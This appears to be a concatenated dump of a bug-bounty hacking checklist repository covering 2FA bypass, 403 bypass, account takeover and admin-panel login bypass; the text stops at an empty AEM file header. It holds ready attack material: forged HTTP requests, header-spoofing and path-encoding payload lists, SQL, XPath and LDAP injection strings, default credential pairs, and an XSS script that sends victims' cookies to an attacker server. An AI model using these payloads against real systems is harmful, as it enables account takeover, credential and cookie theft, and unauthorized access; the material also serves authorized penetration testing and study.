├── 2FA Bypass
└── 2FA bypass.md
├── 403 Bypass
└── 403-bypass.md
├── Acount takeover
└── ATO.md
├── Admin panal
└── adminpanal.md
├── Aem misconfiguration
└── aem.md
├── Api Authentication
└── Authentication.md
├── Api Authorization
└── Authorization.md
├── Authentication
└── authentication.md
├── Bussiness Logic
└── bussiness logic.md
├── CSRF
└── csrf.md
├── Cookie Attack
└── cookie.md
├── File Upload
├── File Upload.md
├── File-Upload.pdf
└── Slides(1).pdf
├── Hacking Django
├── Django.md
└── exposing-django.yaml
├── Hacking Symfony
├── Symfony.md
├── template_1.yaml
├── template_2.yaml
├── template_3.yaml
└── template_4.yaml
├── IDOR Vulnerability
└── idor.md
├── Jire Vulnerability
└── jire.md
├── Json Attack
└── json.md
├── Mass Assignment
└── Mass.md
├── README.md
├── RXSS
└── xss.md
├── Rate limit
└── bypass rate limit.md
├── Rce
└── Rce.md
├── Sql injection
└── sqlpayload.txt
├── exif Vulnerability
└── exif_geo.md
├── register vulnerability
└── register.md
├── reset password
└── reset_password_checklist.md
├── tips from twitter
└── tips_twitter.md
└── tips from twitter
└── tips_twitter_P2.md
/2FA Bypass/2FA bypass.md:
--------------------------------------------------------------------------------
1 | #### Bypassing two-factor authentication
2 | [ ] Flawed two-factor verification logic
3 | Sometimes flawed logic in two-factor authentication means that after a user has completed the initial login step, the website doesn't adequately verify that the same user is completing the second step
4 | For example, the user logs in with their normal credentials in the first step as follows:
5 |
6 | ```
7 | POST /login-steps/first HTTP/1.1
8 | Host: vulnerable-website.com
9 | ...
10 | username=carlos&password=qwerty
11 | ```
12 |
13 | They are then assigned a cookie that relates to their account, before being taken to the second step of the login process:
14 |
15 | ```
16 | HTTP/1.1 200 OK
17 | Set-Cookie: account=carlos
18 |
19 | GET /login-steps/second HTTP/1.1
20 | Cookie: account=carlos
21 | ```
22 |
23 | When submitting the verification code, the request uses this cookie to determine which account the user is trying to access:
24 |
25 | ```
26 | POST /login-steps/second HTTP/1.1
27 | Host: vulnerable-website.com
28 | Cookie: account=carlos
29 | ...
30 | verification-code=123456`
31 | ```
32 |
33 | In this case, an attacker could log in using their own credentials but then change the value of the `account` cookie to any arbitrary username when submitting the verification code.
34 |
35 | ```
36 | POST /login-steps/second HTTP/1.1
37 | Host: vulnerable-website.com
38 | Cookie: account=victim-user
39 | ...
40 | verification-code=123456
41 | ```
42 |
43 | [ ] Clickjacking on 2FA Disable Feature
44 | ```
45 | 1. Try to Iframe the page where the application allows a user to disable 2FA
46 | 2. If Iframe is successful, try to perform a social engineering attack to manipulate victim to fall in your trap.
47 | ```
48 |
49 | [ ] Response Manipulation
50 | ```
51 | 1. Check Response of the 2FA Request.
52 | 2. If you Observe "Success":false
53 | 3. Change this to "Success":true and see if it bypass the 2FA
54 | ```
55 |
56 | [ ] Status Code Manipulation
57 | ```
58 | 1. If the Response Status Code is 4XX like 401, 402, etc.
59 | 2. Change the Response Status Code to "200 OK" and see if it bypass the 2FA
60 | ```
61 |
62 | [ ] 2FA Code Reusability
63 | ```
64 | 1. Request a 2FA code and use it
65 | 2. Now, Re-use the 2FA code and if it is used successfully that's an issue.
66 | 3. Also, try requesting multiple 2FA codes and see if previously requested Codes expire or not when a new code is requested
67 | 4. Also, try to re-use the previously used code after long time duration say 1 day or more. That will be an potential issue as 1 day is enough duration to crack and guess a 6-digit 2FA code.
68 | ```
69 |
70 | [ ] CSRF on 2FA Disable Feature
71 | ```
72 | 1. Request a 2FA code and use it
73 | 2. Now, Re-use the 2FA code and if it is used successfully that's an issue.
74 | 3. Also, try requesting multiple 2FA codes and see if previously requested Codes
75 | expire or not when a new code is requested
76 | 4. Also, try to re-use the previously used code after long time duration say 1 day or
77 | more. That will be an potential issue as 1 day is enough duration to crack and guess
78 | a 6-digit 2FA code
79 | ```
80 |
81 |
82 | [ ] Backup Code Abuse
83 | ```
84 | Apply same techniques used on 2FA such as Response/Status Code Manipulation,
85 | Brute-force, etc. to bypass Backup Codes and disable/reset 2FA
86 | ```
87 |
88 |
89 | [ ] Enabling 2FA Doesn't Expire Previous Session
90 | ```
91 | 1. Login to the application in two different browsers and enable 2FA from 1st session.
92 | 2. Use 2nd session and if it is not expired, it could be an issue if there is an insufficient
93 | session expiration issue. In this scenario if an attacker hijacks an active session before
94 | 2FA, it is possible to carry out all functions without a need for 2FA
95 | ```
96 |
97 | [ ] 2FA Refer Check Bypass
98 | ```
99 | 1. Directly Navigate to the page which comes after 2FA or any other authenticated
100 | page of the application.
101 | 2. If there is no success, change the refer header to the 2FA page URL. This may fool
102 | application to pretend as if the request came after satisfying 2FA Condition
103 | ```
104 |
105 | [ ] 2FA Code Leakage in Response
106 | ```
107 | 1. At 2FA Code Triggering Request, such as Send OTP functionality, capture the Request.
108 | 2. See the Response of this request and analyze if the 2FA Code is leaked.
109 | ```
110 |
111 | [ ] JS File Analysis
112 | ```
113 | 1. while triggering the 2FA Code Request,
114 | 2. Analyze all the JS Files that are referred in the Response
115 | 3. to see if any JS file contain information that can help bypass 2FA code.
116 | ```
117 |
118 | [ ] Lack of Brute-Force Protection
119 | ```
120 | This involves all sort of issues which comes under security misconfiguration such as
121 | lack of rate limit, no brute-force protection, etc.
122 | 1. Request 2FA code and capture this request.
123 | 2. Repeat this request for 100-200 times and if there is no limitation set, that's a rate limit issue.
124 | 3. At 2FA Code Verification page, try to brute-force for valid 2FA and see if there is any success.
125 | 4. You can also try to initiate, requesting OTPs at one side and brute-forcing at
126 | another side. Somewhere the OTP will match in middle and may give you a quick result
127 | ```
128 |
129 | [ ] Password Reset/Email Change - 2FA Disable
130 | ```
131 | 1. Assuming that you are able to perform email change or password reset for the
132 | victim user or make victim user do it by any means possible.
133 | 2. 2FA is disabled after the email is changed or password is reset. This could
134 | be an issue for some organizations. However, depends on case by case basis.
135 | ```
136 |
137 | [ ] Missing 2FA Code Integrity Validation
138 | ```
139 | 1. Request a 2FA code from Attacker Account.
140 | 2. Use this valid 2FA code in the victim 2FA Request and see if it bypass the 2FA Protection.
141 | ```
142 |
143 | [ ] Direct Request
144 | ```
145 | 1. Directly Navigate to the page which comes after 2FA or any other authenticated
146 | page of the application.
147 | 2. See if this bypasses the 2FA restrictions.
148 | 3. try to change the **Referrer header** as if you came from the 2FA page.
149 | ```
150 |
151 | [ ] Reusing token
152 | ```
153 | 1. Maybe you can reuse a previously used token inside the account to authenticate.
154 | ```
155 |
156 | [ ] Sharing unused tokens
157 | ```
158 | 1. Check if you can get the token from your account and try to use it to bypass the 2FA in a different account.
159 | ```
160 |
161 | [ ] Leaked Token
162 | ```
163 | 1. Is the token leaked on a response from the web application?
164 | ```
165 |
166 | [ ] Session permission
167 | ```
168 | 1. Using the same session start the flow using your account and the victim's account.
169 | 2. When reaching the 2FA point on both accounts,
170 | 3. complete the 2FA with your account but do not access the next part.
171 | 4. Instead of that, try to access the next step with the victim's account flow.
172 | 5. If the back-end only set a boolean inside your sessions saying that you have successfully passed the 2FA you will be able to bypass the 2FA of the victim.
173 | ```
174 |
175 | [ ] Password reset function
176 | ```
177 | 1. In almost all web applications the **password reset function automatically logs the user into the application** after the reset procedure is completed.
178 | 2. Check if a **mail** is sent with a **link** to **reset the password** and if you can **reuse** that **link **to reset the password as **many times as you want** (even if the victim changes his email address).
179 | ```
180 |
181 | [ ] Lack of Rate limit
182 | ```
183 | Is there any limit on the number of codes that you can try, so you can just brute force it? Be careful with a possible "silent" rate limit, always try several codes and then the real one to confirm the vulnerability.
184 | ```
185 |
186 | [ ] Flow rate limit but no rate limit
187 | ```
188 | In this case, there is a flow rate limit (you have to brute force it very slowly: 1 thread and some sleep before 2 tries) but no rate limit. So with enough time, you can be able to find the valid code.
189 | ```
190 |
191 | [ ] Re-send code and reset the limit
192 | ```
193 | There is a rate limit but when you "resend the code" the same code is sent and the rate limit is reset. Then, you can brute force the code while you resend it so the rate limit is never reached.
194 | ```
195 |
196 | [ ] Client side rate limit bypass
197 | ```
198 | {% content-ref url="rate-limit-bypass.md" %} rate-limit-bypass.md {% endcontent-ref %}
199 | ```
200 |
201 | [ ] Lack of rate limit in the user's account
202 | ```
203 | Sometimes you can configure the 2FA for some actions inside your account (change mail, password...). However, even in cases where there is a rate limit when you tried to log in, there isn't any rate limit to protect actions inside the account.
204 | ```
205 |
206 | [ ] Lack of rate limit re-sending the code via SMS
207 | ```
208 | You won't be able to bypass the 2FA but you will be able to waste the company's money.
209 | ```
210 |
211 | [ ] Infinite OTP regeneration
212 | ```
213 | If you can **generate a new OTP infinite times**, the** OTP is simple enough** (4 numbers), and you can try up to 4 or 5 tokens per generated OTP, you can just try the same 4 or 5 tokens every time and generate OTPs until it matches the ones you are using.
214 | ```
215 |
216 | [ ] Guessable cookie
217 | ```
218 | If the "remember me" functionality uses a new cookie with a guessable code, try to guess it.
219 | ```
220 |
221 | [ ] IP address
222 | ```
223 | If the "remember me" functionality is attached to your IP address, you can try to figure out the IP address of the victim and impersonate it using the **X-Forwarded-For** header.
224 | ```
225 |
226 | [ ] Subdomains
227 | ```
228 | If you can find some "testing" subdomains with the login functionality, they could be using old versions that don't support 2FA (so it is directly bypassed) or those endpoints could support a vulnerable version of the 2FA.
229 | ```
230 |
231 | [ ] APIs
232 | ```
233 | If you find that the 2FA is using an API located under a /v*/ directory (like "/v3/"), this probably means that there are older API endpoints that could be vulnerable to some kind of 2FA bypass.
234 | ```
235 |
236 | [ ] Previous sessions
237 | ```
238 | When the 2FA is enabled, previous sessions created should be ended. This is because when a client has his account compromised he could want to protect it by activating the 2FA, but if the previous sessions aren't ended, this won't protect him.
239 | ```
240 |
241 |
242 | [ ] Improper access control to backup codes
243 | ```
244 | Backup codes are generated immediately after 2FA is enabled and are available on a single request. After each subsequent call to the request, the codes can be regenerated or remain unchanged (static codes). If there are CORS misconfigurations/XSS vulnerabilities and other bugs that allow you to “pull” backup codes from the response request of the backup code endpoint, then the attacker could steal the codes and bypass 2FA if the username and password are known.
245 | ```
246 |
247 | [ ] Information Disclosure
248 | ```
249 | If you notice some confidential information appear on the 2FA page that you didn't know previously (like the phone number), then this can be considered an information disclosure vulnerability.
250 | ```
251 |
252 | [ ] Bypass 2FA with null or 000000
253 |
254 | [ ] Previously created sessions continue being valid after MFA activation
255 | ```
256 | 1 access the same account on https://account.grammarly.com in two devices
257 | 2 on device 'A' go to https://account.grammarly.com/security > complete all steps to activate the 2FA system
258 | Now the 2FA is activated for this account
259 | 3 back to device 'B' reload the page The session still active
260 | ```
261 |
262 | [ ] Enable 2FA without verifying the email
263 | I able to add 2FA to my account without verifying my email
264 | ```
265 | Attack scenario :
266 |
267 | Attacker sign up with victim email (Email verification will be sent to victim email).
268 | Attacker able to login without verifying email.
269 | Attacker add 2FA.
270 | ```
271 |
272 | [ ] Password not checked when disabling 2FA
273 | ```
274 | PoC
275 | 1- go to your account and activate the 2FA from /settings/auth
276 | 2- after active this option click on Disabled icon beside Two-factor authentication.
277 | 3- a new window will open asking for Authentication or backup code - Password to confirm the disabled.
278 | 4- in the first box enter a valid Authentication or backup code and in the password filed enter any random/wrong password and click save.
279 | 5- the option will be disabled successful without check the validation of the password.
280 | ```
281 |
282 | [ ] “email” MFA mode allows bypassing MFA from victim’s device when the device trust is not expired
283 |
284 | ```
285 | Steps To Reproduce:
286 | Note:
287 | 1-Use burp suite or another tool to intercept the requests
288 | 2-Turn on and configure your MFA
289 | 3-Login with your email and password
290 | 4-The page of MFA is going to appear
291 | 5-Enter any random number
292 | 6-when you press the button "sign in securely" intercept the request POST auth.grammarly.com/v3/api/login and in the POST message change the fields:
293 | "mode":"sms" by "mode":"email"
294 | "secureLogin":true by "secureLogin":false
295 |
296 | 7-send the modification and check, you are in your account! It was not necessary to enter the phone code.
297 | ```
298 |
299 | [ ] 2FA bypass by sending blank code
300 | ```
301 | 1- Login to Glassdoor and navigate to https://www.glassdoor.com/member/account/securitySettings_input.htm
302 | 2- Enable 2FA
303 | 3- Logout
304 | 4- Login again and notice OTP is asked
305 | 5- Now using Burp suite intercept the POST request by sending incorrect code. [Do not forward]
306 | 6- Before forwarding the request to server, remove the code and forward
307 | 7- Turnoff Intercept and notice that your login request has been fulfilled
308 | ```
309 |
--------------------------------------------------------------------------------
/403 Bypass/403-bypass.md:
--------------------------------------------------------------------------------
1 | [ ] Tools
2 | ```
3 | https://github.com/iamj0ker/bypass-403
4 | https://github.com/channyein1337/403-bypass/blob/main/403-bypass.py
5 | https://github.com/nico989/B1pass3r
6 | https://github.com/Dheerajmadhukar/4-ZERO-3
7 | ```
8 | [ ] bypass by fuzz or brute force
9 | ```
10 | you can use dirsearch tool or discovery content path
11 | ```
12 |
13 | [ ] bypass by waybachurl
14 | ```
15 | search in wayback about this subdomain you can find any important path
16 | ```
17 |
18 | [ ] bypass by header names
19 | ```
20 | Base-Url
21 | Client-IP
22 | Http-Url
23 | Proxy-Host
24 | Proxy-Url
25 | Real-Ip
26 | Redirect
27 | Referer
28 | Referrer
29 | Refferer
30 | Request-Uri
31 | Uri
32 | Url
33 | X-Client-IP
34 | X-Custom-IP-Authorization
35 | X-Forward-For
36 | X-Forwarded-By
37 | X-Forwarded-For-Original
38 | X-Forwarded-For
39 | X-Forwarded-Host
40 | X-Forwarded-Port
41 | X-Forwarded-Port
42 | X-Forwarded-Port
43 | X-Forwarded-Port
44 | X-Forwarded-Port
45 | X-Forwarded-Scheme
46 | X-Forwarded-Scheme
47 | X-Forwarded-Server
48 | X-Forwarded
49 | X-Forwarder-For
50 | X-Host
51 | X-Http-Destinationurl
52 | X-Http-Host-Override
53 | X-Original-Remote-Addr
54 | X-Original-Url
55 | X-Originating-IP
56 | X-Proxy-Url
57 | X-Real-Ip
58 | X-Remote-Addr
59 | X-Remote-IP
60 | X-Rewrite-Url
61 | X-True-IP
62 | ```
63 |
64 | [ ] bypass by header payloads
65 | ```
66 | Base-Url: 127.0.0.1
67 | Client-IP: 127.0.0.1
68 | Http-Url: 127.0.0.1
69 | Proxy-Host: 127.0.0.1
70 | Proxy-Url: 127.0.0.1
71 | Real-Ip: 127.0.0.1
72 | Redirect: 127.0.0.1
73 | Referer: 127.0.0.1
74 | Referrer: 127.0.0.1
75 | Refferer: 127.0.0.1
76 | Request-Uri: 127.0.0.1
77 | Uri: 127.0.0.1
78 | Url: 127.0.0.1
79 | X-Client-IP: 127.0.0.1
80 | X-Custom-IP-Authorization: 127.0.0.1
81 | X-Forward-For: 127.0.0.1
82 | X-Forwarded-By: 127.0.0.1
83 | X-Forwarded-For-Original: 127.0.0.1
84 | X-Forwarded-For: 127.0.0.1
85 | X-Forwarded-Host: 127.0.0.1
86 | X-Forwarded-Port: 443
87 | X-Forwarded-Port: 4443
88 | X-Forwarded-Port: 80
89 | X-Forwarded-Port: 8080
90 | X-Forwarded-Port: 8443
91 | X-Forwarded-Scheme: http
92 | X-Forwarded-Scheme: https
93 | X-Forwarded-Server: 127.0.0.1
94 | X-Forwarded: 127.0.0.1
95 | X-Forwarder-For: 127.0.0.1
96 | X-Host: 127.0.0.1
97 | X-Http-Destinationurl: 127.0.0.1
98 | X-Http-Host-Override: 127.0.0.1
99 | X-Original-Remote-Addr: 127.0.0.1
100 | X-Original-Url: 127.0.0.1
101 | X-Originating-IP: 127.0.0.1
102 | X-Proxy-Url: 127.0.0.1
103 | X-Real-Ip: 127.0.0.1
104 | X-Remote-Addr: 127.0.0.1
105 | X-Remote-IP: 127.0.0.1
106 | X-Rewrite-Url: 127.0.0.1
107 | X-True-IP: 127.0.0.1
108 | ```
109 |
110 | [ ] bypass by url payloads
111 | ```
112 | #
113 | #?
114 | %09
115 | %09%3b
116 | %09..
117 | %09;
118 | %20
119 | %23
120 | %23%3f
121 | %252f%252f
122 | %252f/
123 | %2e%2e
124 | %2e%2e/
125 | %2f
126 | %2f%20%23
127 | %2f%23
128 | %2f%2f
129 | %2f%3b%2f
130 | %2f%3b%2f%2f
131 | %2f%3f
132 | %2f%3f/
133 | %2f/
134 | %2f;?
135 | %2f?;
136 | %3b
137 | %3b%09
138 | %3b%2f%2e%2e
139 | %3b%2f%2e%2e%2f%2e%2e%2f%2f
140 | %3b%2f%2e.
141 | %3b%2f..
142 | %3b/%2e%2e/..%2f%2f
143 | %3b/%2e.
144 | %3b/%2f%2f../
145 | %3b/..
146 | %3b//%2f../
147 | %3f%23
148 | %3f%3f
149 | %3f.php
150 | ..
151 | ..%00/
152 | ..%00/;
153 | ..%00;/
154 | ..%09
155 | ..%0d/
156 | ..%0d/;
157 | ..%0d;/
158 | ..%5c/
159 | ..%ff/
160 | ..%ff/;
161 | ..%ff;/
162 | ../
163 | ..;%00/
164 | ..;%0d/
165 | ..;%ff/
166 | ..;\
167 | ..;\;
168 | ..\
169 | ..\;
170 | .html
171 | .json
172 | /
173 | /#
174 | /%20
175 | /%20#
176 | /%20%23
177 | /%23
178 | /%252e%252e%252f/
179 | /%252e%252e%253b/
180 | /%252e%252f/
181 | /%252e%253b/
182 | /%252e/
183 | /%252f
184 | /%2e%2e
185 | /%2e%2e%2f/
186 | /%2e%2e%3b/
187 | /%2e%2e/
188 | /%2e%2f/
189 | /%2e%3b/
190 | /%2e%3b//
191 | /%2e/
192 | /%2e//
193 | /%2f
194 | /%3b/
195 | /..
196 | /..%2f
197 | /..%2f..%2f
198 | /..%2f..%2f..%2f
199 | /../
200 | /../../
201 | /../../../
202 | /../../..//
203 | /../..//
204 | /../..//../
205 | /../..;/
206 | /.././../
207 | /../.;/../
208 | /..//
209 | /..//../
210 | /..//../../
211 | /..//..;/
212 | /../;/
213 | /../;/../
214 | /..;%2f
215 | /..;%2f..;%2f
216 | /..;%2f..;%2f..;%2f
217 | /..;/
218 | /..;/../
219 | /..;/..;/
220 | /..;//
221 | /..;//../
222 | /..;//..;/
223 | /..;/;/
224 | /..;/;/..;/
225 | /./
226 | /.//
227 | /.;/
228 | /.;//
229 | //
230 | //..
231 | //../../
232 | //..;
233 | //./
234 | //.;/
235 | ///..
236 | ///../
237 | ///..//
238 | ///..;
239 | ///..;/
240 | ///..;//
241 | //;/
242 | /;/
243 | /;//
244 | /;?
245 | /;x
246 | /;x/
247 | /?
248 | /?;
249 | /x/../
250 | /x/..//
251 | /x/../;/
252 | /x/..;/
253 | /x/..;//
254 | /x/..;/;/
255 | /x//../
256 | /x//..;/
257 | /x/;/../
258 | /x/;/..;/
259 | ;
260 | ;%09
261 | ;%09..
262 | ;%09..;
263 | ;%09;
264 | ;%2F..
265 | ;%2f%2e%2e
266 | ;%2f%2e%2e%2f%2e%2e%2f%2f
267 | ;%2f%2f/../
268 | ;%2f..
269 | ;%2f..%2f%2e%2e%2f%2f
270 | ;%2f..%2f..%2f%2f
271 | ;%2f..%2f/
272 | ;%2f..%2f/..%2f
273 | ;%2f..%2f/../
274 | ;%2f../%2f..%2f
275 | ;%2f../%2f../
276 | ;%2f..//..%2f
277 | ;%2f..//../
278 | ;%2f..///
279 | ;%2f..///;
280 | ;%2f..//;/
281 | ;%2f..//;/;
282 | ;%2f../;//
283 | ;%2f../;/;/
284 | ;%2f../;/;/;
285 | ;%2f..;///
286 | ;%2f..;//;/
287 | ;%2f..;/;//
288 | ;%2f/%2f../
289 | ;%2f//..%2f
290 | ;%2f//../
291 | ;%2f//..;/
292 | ;%2f/;/../
293 | ;%2f/;/..;/
294 | ;%2f;//../
295 | ;%2f;/;/..;/
296 | ;/%2e%2e
297 | ;/%2e%2e%2f%2f
298 | ;/%2e%2e%2f/
299 | ;/%2e%2e/
300 | ;/%2e.
301 | ;/%2f%2f../
302 | ;/%2f/..%2f
303 | ;/%2f/../
304 | ;/.%2e
305 | ;/.%2e/%2e%2e/%2f
306 | ;/..
307 | ;/..%2f
308 | ;/..%2f%2f../
309 | ;/..%2f..%2f
310 | ;/..%2f/
311 | ;/..%2f//
312 | ;/../
313 | ;/../%2f/
314 | ;/../../
315 | ;/../..//
316 | ;/.././../
317 | ;/../.;/../
318 | ;/..//
319 | ;/..//%2e%2e/
320 | ;/..//%2f
321 | ;/..//../
322 | ;/..///
323 | ;/../;/
324 | ;/../;/../
325 | ;/..;
326 | ;/.;.
327 | ;//%2f../
328 | ;//..
329 | ;//../../
330 | ;///..
331 | ;///../
332 | ;///..//
333 | ;?
334 | ;x
335 | ;x/
336 | ;x;
337 | ?
338 | ?#
339 | ?.php
340 | ?;
341 | ??
342 | ///
343 | /%2f/
344 | //%2f
345 | %2f/%2f
346 | %2f%2f%2f
347 | %2f//
348 | ```
349 |
--------------------------------------------------------------------------------
/Acount takeover/ATO.md:
--------------------------------------------------------------------------------
1 | [ ] **a lot of ideas in this article by omar hashem**
2 | ```
3 | https://medium.com/bugbountywriteup/hubspot-full-account-takeover-in-bug-bounty-4e2047914ab5
4 | ```
5 | [ ] **OAuth to Account takeover**
6 | ```
7 | https://book.hacktricks.xyz/pentesting-web/oauth-to-account-takeover
8 | ```
9 |
10 |
11 | [ ] **Pre-Account Takeover**
12 |
13 | A pre-account takeover occurs when an attacker creates a user account using one signup method and the victim creates another account using a different signup method using the same email address. Because the email addresses are the same, the application connects the two accounts. when the app is unable to validate email addresses.
14 | ```
15 | How to hunt :-
16 | Try registering any email address without verifying it.
17 | Try registering an account again, but this time with a different method, such as ‘sign up with Google’ from same email address.
18 | Due to the fact that both email addresses are the same, the web application will link the two accounts.
19 | Now try logging in using the specified password and username. Check to see whether you can see information from that account that was retrieved via Google.
20 | ```
21 |
22 |
23 | [ ] **Account takeover due to Improper Rate limit**
24 | ```
25 | How to Hunt:-
26 |
27 | capture the request at the login page, while providing username and password.
28 | send it to intruder and Brute force it.
29 | Analyze the response and length.
30 | ```
31 |
32 |
33 | [ ] **Account takeover by utilizing sensitive data exposure**
34 | ```
35 | Sensitive data exposure occurs when a web application failed to properly protect confidential information, resulting in the disclosure of sensitive information or data about users, or anything related to them, to a third party.
36 |
37 | Occasionally, the application displays unnecessary data, such as valid OTPs, hashes, or passwords, over the request and response parts. So it’s a good idea to pay attention to the response and request portions.
38 | ```
39 |
40 |
41 | [ ] **login**
42 | ```
43 | 1. check if you are able to brute force the password
44 | 2. Test for OAuth misconfigurations
45 | 3. check if you are able to bruteforce the login OTP
46 | 4. check for JWT mesconfigurations
47 | 5. Test for SQL injection to bypass authentication ```admin" or 1=1;--```
48 | 6. check if the application validates the OTP or Token
49 | ```
50 |
51 |
52 | [ ] **password reset**
53 | ```
54 | 1. check if you are able to brute force the password reset OTP
55 | 2. test for token predectability
56 | 3. test for JWT misconfigurations
57 | 4. check if the password reset endpoint is vulnerable to IDOR
58 | 5. check if the password reset endpoint is vulnerable to Host Header injection
59 | 6. check if the password reset endpoint is leaking the token or OTP in the HTTP response
60 | 7. check if the application validates the OTP or Token
61 | 8. test for HTTP parameter Pollution (HPP)
62 |
63 | ```
64 |
65 |
66 | [ ] **XSS to Account Takeover**
67 |
68 | if the application does not use auth token or you can't access the cookies because the "HttpOnly" flag, you can obtain the CSRF token and craft a request to change the user's email or password
69 | ```
70 | 1. try to exfiltrate the cookies
71 | 2. try to exfiltrate the Auth Token
72 | 3. if the cookie's "domain" attribute is set, search for xss in the subdomains and use it to exfiltrate the cookies
73 | - PoC Example:
74 | ```html
75 |
76 | <script>
77 | /*
78 | this script will create a hidden <img> element
79 | when the browser tries to load the image
80 | the victim's cookies will be sent to your server
81 | */
82 |
83 | var new_img = document.createElement('img');
84 | new_img.src = "http://yourserver/" + document.cookie;
85 | new_img.style = 'display: none;'
86 | document.body.appendChild(new_img);
87 | </script>
88 |
89 | ```
90 | ```
91 |
92 |
93 | [ ] **CSRF to Account Takeover**
94 | ```
95 | 1. check if the email update endpoint is vulnerable to CSRF
96 | 2. check if the password change endpoint is vulnerable to CSRF
97 | ```
98 |
99 |
100 | [ ] **IDOR to Account Takerover**
101 | ```
102 | 1. checck if the email update endpoint is vulnerable to IDOR
103 | 2. check if the password change endpoint is vulnerable to IDOR
104 | 3. check if the password reset endpoint vulnerable to IDOR
105 | ```
106 |
107 |
108 | [ ] **Account takeover by Response & Status code Manipulation**
109 |
110 |
111 | [ ] **Account takeover by exploiting Weak cryptography**
112 | ```
113 | check this
114 | https://infosecwriteups.com/weak-cryptography-in-password-reset-to-full-account-takeover-fc61c75b36b9
115 | ```
116 |
117 |
118 | [ ] **Password or email change function**
119 | ```
120 | IF you try to change password and see email parameter in password change request, Try changing your email to victim email
121 | ```
122 |
123 |
124 | [ ] **Sing-Up Function**
125 | ```
126 | IF you try to sing-up new account in target site, in email filed try set target email
127 |
128 | IF you try to sing-up new account in target site using 3rd party, in 3d party use phone number instead email then link 3rd account with target site.Then Go setting try link victim email in you account
129 | ```
130 |
131 | [ ] **Rest Token**
132 | ```
133 | Try to use your REST Token with Target account. Hint: email=Target@email.com&code=$Attacker_TOKEN$
134 |
135 | Brute Force Rest Token if it is numeric. Hint : email=Target@email.com&code=$TOKEN$
136 |
137 | Try to figure out how the token are generated: 1. Generated based on TimeStamp OR ID of user OR email of user
138 | ```
139 |
140 | [ ] **Host Header Injection**
141 | ```
142 | when send rest account request intercept POST Request and Change Host header value from target.site TO Attacker.com: Hint POST /PassRest HTTP1/1 Host: Attacker.com
143 | ```
144 |
145 | [ ] **CORS Misconfiguration to Account Takeover**
146 |
147 | If the page contains CORS missconfigurations you might be able to steal sensitive information from the user to takeover his account or make him change auth information for the same purpose:
148 | ```
149 | https://book.hacktricks.xyz/pentesting-web/cors-bypass
150 | ```
151 | [ ] **Account takeover via leaked session cookie**
152 | ```
153 | https://hackerone.com/reports/745324
154 | ```
155 | [ ] **HTTP Request Smuggling to ATO**
156 | ```
157 | https://hackerone.com/reports/737140
158 | https://hackerone.com/reports/740037
159 | ```
160 |
161 | [ ] **Bypassing Digits origin validation which leads to account takeover**
162 | ```
163 | https://hackerone.com/reports/129873
164 | ```
165 | [ ] Top ATO report in hackerone
166 | ```
167 | https://github.com/reddelexc/hackerone-reports/blob/master/tops_by_bug_type/TOPACCOUNTTAKEOVER.md
168 | ```
169 |
--------------------------------------------------------------------------------
/Admin panal/adminpanal.md:
--------------------------------------------------------------------------------
1 | [ ] defualt credentials
2 | [defualt credentials](https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force#default-credentials)
3 | ```
4 | admin:admin
5 | admin:password
6 | author:author
7 | administrator:password
8 | admin123:password
9 | username:pass12345
10 | and many of defualt credentials
11 | ```
12 |
13 | [ ] Bypass by SQL Injection
14 | ```
15 | inject username or paswword with a lot of payloads:
16 | => error based
17 | => time based
18 | ```
19 |
20 | [ ] By Cross Site Scripting(XSS)
21 | ```
22 | inject username or password with xss payloads:
23 | => url encode
24 | => base64 encode
25 | ```
26 |
27 | [ ] By Manipulating the Response
28 | ```
29 | change the status of response from
30 | 200 => 302
31 | failed => success
32 | error => success
33 | 403 => 200
34 | 403 => 302
35 | false => true
36 | ```
37 |
38 | [ ] Bypass by Brute Force Attack
39 | ```
40 | https://medium.com/@uttamgupta_/1-how-to-perform-login-brute-force-using-burp-suite-9d06b67fb53d
41 | https://medium.com/@uttamgupta_/broken-brute-force-protection-ip-block-aae835895a74
42 | ```
43 |
44 | [ ] Bypass by Directory Fuzzing Attack
45 | ```
46 | use this list to fuzz
47 | https://github.com/six2dez/OneListForAll
48 | ```
49 |
50 | [ ] By Removing Parameter in Request
51 | ```
52 | When you enter wrong credentials the site shows error like username and password is incorrect/does not match,
53 | password is incorrect for this username etc,
54 | this type of response is shown by the site so can try this method Huh.
55 | First you intercept the request and remove the password parameter in the request and forward the request.
56 | Then the server sees that the username is available and logs you in to the site.
57 | This problem occurs when the server does not analyze the request properly
58 | ```
59 |
60 | [ ] check js file in login page
61 | ```
62 | it can contain a important path or username and password
63 | ```
64 |
65 | [ ] Check for comments inside the page
66 | ```
67 | it can contain a important info such as username and password
68 | ```
69 |
70 | [ ] Check the PHP comparisons error:
71 | ```
72 | user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b
73 | ```
74 |
75 | [ ] Change content type to json and send json values (bool true included)
76 | ```
77 | If you get a response saying that POST is not supported you can try to send the JSON in the body but with a GET request with Content-Type: application/json
78 | ```
79 |
80 | [ ] Check nodejs potential parsing error
81 |
82 | [check this article](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)
83 | ```
84 | 1. Nodejs will transform that payload to a query similar to the following one: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; which makes the password bit to be always true.
85 | 2. If you can send a JSON object you can send "password":{"password": 1} to bypass the login.
86 | 3. Remember that to bypass this login you still need to know and send a valid username.
87 | 4. Adding "stringifyObjects":true option when calling mysql.createConnection will eventually block all unexpected behaviours when Object is passed in the parameter.
88 | ```
89 |
90 | [ ] No SQL Injection
91 | ```
92 | https://book.hacktricks.xyz/pentesting-web/nosql-injection#basic-authentication-bypass
93 | ```
94 |
95 | [ ] XPath Injection
96 | ```
97 | ' or '1'='1
98 | ' or ''='
99 | ' or 1]%00
100 | ' or /* or '
101 | ' or "a" or '
102 | ' or 1 or '
103 | ' or true() or '
104 | 'or string-length(name(.))<10 or'
105 | 'or contains(name,'adm') or'
106 | 'or contains(.,'adm') or'
107 | 'or position()=2 or'
108 | admin' or '
109 | admin' or '1'='2
110 | ```
111 |
112 | [ ] LDAP Injection
113 | ```
114 | *
115 | *)(&
116 | *)(|(&
117 | pwd)
118 | *)(|(*
119 | *))%00
120 | admin)(&)
121 | pwd
122 | admin)(!(&(|
123 | pwd))
124 | admin))(|(|
125 | ```
126 |
127 | [ ] Authorization
128 | ```
129 | https://www.securify.nl/en/advisory/authorization-bypass-in-infinitewp-admin-panel/
130 | ```
131 |
--------------------------------------------------------------------------------
/Aem misconfiguration/aem.md:
--------------------------------------------------------------------------------
